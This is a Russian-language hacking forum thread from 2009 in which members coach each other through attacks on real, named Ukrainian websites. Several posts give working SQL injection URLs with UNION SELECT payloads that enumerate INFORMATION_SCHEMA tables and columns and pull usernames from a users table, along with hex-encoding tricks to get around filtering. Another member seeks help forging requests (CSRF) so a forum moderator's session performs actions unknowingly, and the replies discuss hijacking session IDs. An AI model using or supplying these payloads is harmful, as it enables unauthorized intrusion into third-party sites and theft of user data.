Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Кодировка сдесь не причём, гораздо важнее какая база .

    В Access такое бывает, какой-то алгоритм хеширования пароля

    Если мускул , то или aes_encrypt(скорее всего), или самопис какой-то, по одному значению непонятно. С этим ты ничего не поделаешь, если только ключ угадаешь :)
     
  2. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Так в чем проблема-то?

    Code:
    http://www.bookzone.com.ua/catalog.php?cid=-11028+union+select+table_name+from+INFORMATION_SCHEMA.TABLES+LIMIT+1+OFFSET+0--
     
  3. TELO

    TELO Member

    Joined:
    21 Jan 2009
    Messages:
    68
    Likes Received:
    44
    Reputations:
    6
    спасибо,нашол таблу. я просто не понял что за версия такая
     
  4. TELO

    TELO Member

    Joined:
    21 Jan 2009
    Messages:
    68
    Likes Received:
    44
    Reputations:
    6
    а скажите плиз,как перевести такой пасс ********
     
  5. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    TELO в этой таблице нет пассов
    http://www.postgresql.org/docs/7.4/static/view-pg-user.html
    Ищи другую :)
     
  6. RekRut

    RekRut Elder - Старейшина

    Joined:
    27 Feb 2006
    Messages:
    116
    Likes Received:
    26
    Reputations:
    0
    мы под твоии звездами нифига не видим, если ты имеешь ввиду как вытащить пароль с под звезд есть спецом проги для етого в гугле пиши типо "стащить пароль из под звездочек"
     
  7. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Жжешь ))
    Сори за оффтоп - не удержался ^^
     
  8. Qam

    Qam New Member

    Joined:
    16 Jan 2009
    Messages:
    30
    Likes Received:
    3
    Reputations:
    0
    Как по вашему мнению за что может отвечать переменая сид в урл такого вида posting.php?mode=delete&p=40&sid=790c50da612628e41f4f900a830920c5
    Я понимаю может этот вопрос выглядил глупо,просто я пытаюсь осуществить на сайт атаку CSRF!Мне кажется эта переменая мне и мешает пишет мол ошибка сесии!Сильно не ругайте!
     
  9. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    За идентификацию сессии и отвечает
     
  10. Артем Солнце

    Joined:
    19 Jan 2009
    Messages:
    9
    Likes Received:
    16
    Reputations:
    0
    Скачай двиг и посмотри исходники, а если по сабжу то sid - session id
     
    #4810 Артем Солнце, 22 Jan 2009
    Last edited: 22 Jan 2009
  11. Qam

    Qam New Member

    Joined:
    16 Jan 2009
    Messages:
    30
    Likes Received:
    3
    Reputations:
    0
    Я в пыхе не очень,но понял на счет переменной сид вот что:
    если $сид пуста или $сид не равна $юсердата со значением $сесион_ид(если праильно понял $сесион_ид в таких скобках [] была)то показать ошибку на счет сесии как я писал где переменая $юсердата равна $ип и $логин,а $сесион_ид равна $ип,$автологин,$админ,$юсер_ид и еще 2словам без знака переменых это наверное значение из таблицы мускула!Кто подскажет обломавыется ли моя CSRF?Может я смогу подделать эту переменую сид.
     
  12. RekRut

    RekRut Elder - Старейшина

    Joined:
    27 Feb 2006
    Messages:
    116
    Likes Received:
    26
    Reputations:
    0
    Qam хз че ты написал чесно в пол третьего ночи тяжело думается, а поделу
    SID ето тот идентификатор с которым ты лазишь по форумк послу того как успешно залогинился, он может связываться с твоим логином на сайте а может и с логином и пароль сразу , хранится в базе на серве до окончания сессии пока не пройдет определенное количество времени или ты не закроешь браузер,

    если ты думаешь что тупо изменить СИД на другой СИд другого юзверя то такой вариант прокатит только если в кукисах не хранится твой зашифрованный пароль, и если СИД еще жив (тоесть жертва не закрыла браузер)
     
  13. Qam

    Qam New Member

    Joined:
    16 Jan 2009
    Messages:
    30
    Likes Received:
    3
    Reputations:
    0
    RekRut ты похоже понял так:что я хочу просто в юрл заменить свой сид на его и типа я стал им!Нет я хочу совсем другого подсунуть ему адрес сайта перейдя на который его браузер обратится на другой сайт где выпалнит мод его именем (именем атакуемого чела) отправит приват или откроет закрытую тему если он модер конечно!Вот для этого мне и нужно разобраться что есть эта переменая сид,а браузер он полюбому не закроет тк он им же и перейдет на подсунутый мной сайт!(значит сессия будет еще жива)!Смогу ли я подделать эту переменую сид?Чтобы быть более ясне могу выложить кусочек кода если я своими словами плохо объяснил!
     
  14. TELO

    TELO Member

    Joined:
    21 Jan 2009
    Messages:
    68
    Likes Received:
    44
    Reputations:
    6
    а как с такой таблы достать поля?
    FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’Users’ LIMIT 1,1 -- не катит

    Code:
    http://www.bookzone.com.ua/catalog.php?cid=-11028+union+select+user+from+tk_users--
     
  15. TELO

    TELO Member

    Joined:
    21 Jan 2009
    Messages:
    68
    Likes Received:
    44
    Reputations:
    6
    1.как узнать количество полей?

    http://elitka.com.ua/view.php?id=381%27

    2. и вот такая трабла
    Code:
    http://vitlen.com.ua/index.php?categoryID=128%20order%20by%201%20--
    отбражает исходную
    Code:
    http://vitlen.com.ua/index.php?categoryID=128%20UNION%20SELECT%201%20--
    вывод The used SELECT statements have a different number of columns
     
    #4815 TELO, 22 Jan 2009
    Last edited: 22 Jan 2009
  16. Doom123

    Doom123 Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    749
    Likes Received:
    244
    Reputations:
    22
    за хекси Users а знак (=) замени на like

    FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME LIKE 0x5573657273 LIMIT 1,1
     
    #4816 Doom123, 22 Jan 2009
    Last edited: 22 Jan 2009
  17. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    TELO
    5 ветка..

    так нету ошибки.. а при 1,2 есть...
     
    #4817 sabe, 22 Jan 2009
    Last edited: 22 Jan 2009
  18. TELO

    TELO Member

    Joined:
    21 Jan 2009
    Messages:
    68
    Likes Received:
    44
    Reputations:
    6
    непрокатило
    Code:
    http://www.bookzone.com.ua/catalog.php?cid=-11028+union+select+COLUMN_NAME+FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME%20LIKE=0x5573657273%20LIMIT%200,1%20--
     
  19. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    TELO
    после like не = а +

    * = используем когда непосредственно извлекаем где table_name=0x[table_hex]
     
    1 person likes this.
  20. TELO

    TELO Member

    Joined:
    21 Jan 2009
    Messages:
    68
    Likes Received:
    44
    Reputations:
    6
    не там и не там нет вывода
     
Thread Status:
Not open for further replies.